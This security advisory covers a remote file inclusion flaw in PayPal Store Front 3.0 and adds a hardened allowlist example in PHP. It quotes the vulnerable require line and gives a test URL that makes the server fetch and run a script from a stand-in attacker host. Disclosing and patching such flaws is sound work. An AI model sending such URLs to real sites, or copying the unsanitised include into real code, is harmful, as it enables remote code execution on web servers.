PayPal Store Front "is created for small to medium size companies who want to sell products online, but is not limited to it. Any one, who has something to sell, can use this Cart System to sell".
A vulnerability in the product allows remote attackers to include arbitrary PHP files, stored either locally on the server or on a remote host, which are then executed by the server.
Credit:
The original advisory can be downloaded from: http://www.zone-h.org/en/advisories/read/id=3231/.
The information has been provided by Astharot.
Vulnerable systems:
* PayPal Store Front version 3.0
There is a file inclusion vulnerability in the index.php file:
require ($page . ".php");
It is possible for a remote attacker to include an external file and execute arbitrary commands with the privileges of the web server user (nobody by default).
To test the vulnerability you can try the following URL:
http://www.vulnsite.com/index.php?do=ext&page=http://www.attacker.com/index
This URL will cause the file "http://www.attacker.com/index.php" to be included and executed by the server.
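As an added illustration (not code from the advisory or from the PayPal Store Front product), the vulnerable require shown above next to a hardened replacement that maps the request parameter through a fixed allowlist; the page names and the pages/ directory are assumptions, not the vendor's layout.

```php
<?php
// Added example: the include pattern from the advisory and one safe replacement.
// The page names and the pages/ directory below are assumptions.

// Vulnerable form (as in the advisory): $page is taken straight from the query
// string, so a value like "http://attacker.example/index" makes PHP fetch and
// run a remote script, and a local path is reachable the same way.
function include_page_vulnerable(string $page): void
{
    require($page . ".php");
}

// Hardened form: the parameter is only ever used as a key into a fixed map of
// known files. No part of the request reaches the filesystem path.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'catalog' => 'catalog.php',
    'cart'    => 'cart.php',
];

// Returns the absolute path for a known page, or null for anything else.
function resolve_page(?string $page): ?string
{
    if ($page === null || !array_key_exists($page, ALLOWED_PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . ALLOWED_PAGES[$page];
}

function include_page_safe(?string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    require $file;
}

// Defence in depth: even with the allowlist, keep remote includes disabled in
// php.ini (allow_url_include = Off; allow_url_fopen = Off unless something
// genuinely needs it), so a future coding mistake cannot re-open remote inclusion.
include_page_safe($_GET['page'] ?? 'home');
```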
Solution:
An unofficial patch is available for download (for the free version of PayPal Store Front) from here: http://www.zone-h.org/download/file=4957.
Vendor status:
The author has been contacted.